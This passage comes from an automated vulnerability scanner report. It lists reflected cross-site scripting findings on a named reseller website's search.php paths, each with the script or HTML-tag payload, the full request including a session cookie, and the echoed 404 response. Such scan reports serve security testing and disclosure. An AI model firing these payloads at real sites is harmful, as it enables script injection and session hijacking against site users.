Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16c841c<script>alert(1)</script>c8af6c5b133/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1354. http://www.resellerbase.com/detail/16/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2c294<script>alert(1)</script>06edc0d2f24 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes2c294<script>alert(1)</script>06edc0d2f24/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes2c294<script>alert(1)</script>06edc0d2f24/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1355. http://www.resellerbase.com/detail/16/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 24fe5<script>alert(1)</script>6d46f3c6cb4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos24fe5<script>alert(1)</script>6d46f3c6cb4/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos24fe5<script>alert(1)</script>6d46f3c6cb4/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1356. http://www.resellerbase.com/detail/16/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5f65e<script>alert(1)</script>b8b946abcbb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/images5f65e<script>alert(1)</script>b8b946abcbb/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images5f65e<script>alert(1)</script>b8b946abcbb/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1357. http://www.resellerbase.com/detail/16/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 60741<script>alert(1)</script>8b758a0be77 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/images/search.php60741<script>alert(1)</script>8b758a0be77?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/search.php60741<script>alert(1)</script>8b758a0be77?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1358. http://www.resellerbase.com/detail/16/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload d4b41<a>c699ba2cb48 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/16/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchd4b41<a>c699ba2cb48&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchd4b41<a>c699ba2cb48&opt=2 was not found on this server.</p>
...[SNIP]...

2.1359. http://www.resellerbase.com/detail/16/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 1e42d<a>956136fb28d was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/16/themes/kosmos/images/search.php?keyword=search...1e42d<a>956136fb28d&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/search.php?keyword=search...1e42d<a>956136fb28d&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1360. http://www.resellerbase.com/detail/16/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e6850<script>alert(1)</script>8f9aad5540b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&e6850<script>alert(1)</script>8f9aad5540b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&e6850<script>alert(1)</script>8f9aad5540b=1 was not found on this server.</p>
...[SNIP]...

2.1361. http://www.resellerbase.com/detail/16/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 64011<a>319301170f3 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/16/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=264011<a>319301170f3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=264011<a>319301170f3 was not found on this server.</p>
...[SNIP]...

2.1362. http://www.resellerbase.com/detail/16/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f64d6<script>alert(1)</script>6fab8b37a93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf64d6<script>alert(1)</script>6fab8b37a93/16/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf64d6<script>alert(1)</script>6fab8b37a93/16/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1363. http://www.resellerbase.com/detail/16/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d5b46<script>alert(1)</script>c8b0142af2d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16d5b46<script>alert(1)</script>c8b0142af2d/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16d5b46<script>alert(1)</script>c8b0142af2d/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1364. http://www.resellerbase.com/detail/16/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e5b6c<script>alert(1)</script>c2166fc3929 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themese5b6c<script>alert(1)</script>c2166fc3929/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themese5b6c<script>alert(1)</script>c2166fc3929/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1365. http://www.resellerbase.com/detail/16/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4d6d5<script>alert(1)</script>e86c5622130 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos4d6d5<script>alert(1)</script>e86c5622130/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos4d6d5<script>alert(1)</script>e86c5622130/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1366. http://www.resellerbase.com/detail/16/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b7d16<script>alert(1)</script>1bc4179b861 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/search.phpb7d16<script>alert(1)</script>1bc4179b861?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/search.phpb7d16<script>alert(1)</script>1bc4179b861?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1367. http://www.resellerbase.com/detail/16/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 5dad5<a>be2f3ae7b98 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/16/themes/kosmos/search.php?keyword=search...&Submit3=Search5dad5<a>be2f3ae7b98&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/search.php?keyword=search...&Submit3=Search5dad5<a>be2f3ae7b98&opt=2 was not found on this server.</p>
...[SNIP]...

2.1368. http://www.resellerbase.com/detail/16/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 8765f<a>1e05f89c8ef was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/16/themes/kosmos/search.php?keyword=search...8765f<a>1e05f89c8ef&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/search.php?keyword=search...8765f<a>1e05f89c8ef&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1369. http://www.resellerbase.com/detail/16/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5f3b9<script>alert(1)</script>085331967fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&5f3b9<script>alert(1)</script>085331967fa=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&5f3b9<script>alert(1)</script>085331967fa=1 was not found on this server.</p>
...[SNIP]...

2.1370. http://www.resellerbase.com/detail/16/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ec9c1<a>4c61b6de10e was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/16/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2ec9c1<a>4c61b6de10e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2ec9c1<a>4c61b6de10e was not found on this server.</p>
...[SNIP]...

2.1371. http://www.resellerbase.com/detail/16/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1f834<script>alert(1)</script>ba55b2bcc29 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail1f834<script>alert(1)</script>ba55b2bcc29/16/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
